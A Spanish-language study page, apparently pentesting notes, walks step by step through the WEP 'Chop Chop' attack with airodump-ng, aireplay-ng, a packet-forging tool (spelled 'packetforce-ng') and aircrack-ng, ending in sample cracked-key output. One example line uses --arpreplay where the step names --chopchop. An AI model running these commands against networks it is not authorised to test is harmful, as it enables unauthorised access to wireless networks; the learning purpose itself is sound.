Page cover

🌐Chop Chop

Se usa cuando queremos generar más paquetes o hay pocos dispositivos en una red.

Debemos ejecutar esta técnica hasta lograr los suficientes IVs para crackear la llave

Proceso

  • Capturamos un paquete ARP

  • Determinar el Key Stream

  • Creamos un nuevo paquete

  • Inyectamos el paquete en la red para generar más IVs

1. Partimos de un Fake Auth

🌐Fake Autentication

2. Iniciar airodump-ng

Debemos guardar la salida con --write

# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write wep_chopchop wlan0

3. Aireplay --chopchop

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
   >> --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --chopchop -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ> 
sudo aireplay-ng --arpreplay -b 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 wlan0mon 

Para aumentar las posibilidades de éxito el porcentaje debe ser lo más alto posible. Al final obtendremos el keystream en un archivo .xor

4. Iniciar packetforce

sudo packetforce-ng -0 -a <SSID-OBJETIVO> -h <MAC-ADAPTADOR> -k <MASCARA> -l <MASCARA> -y <.XOR> -w <SALIDA> <INTERFAZ> 
sudo packetforce-ng -0 -a 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1130-210747.xor -w packet_chopchop wlan0mon 

Wrote packet to: packet_chopchop

ls
packet_chopchop

5. Aireplay --interactive

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
   >> --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --interactive -r packet_chopchop wlan0mon

Vemos que aumenta el tráfico correctamente en airodump:

6. Iniciar aircrack-ng

Abrir el archivo .cap

sudo aircrack-ng wep_chopchop.cap
KEY FOUND! [12:34:56:78:90]
Password: 1234567890

Última actualización

¿Te fue útil?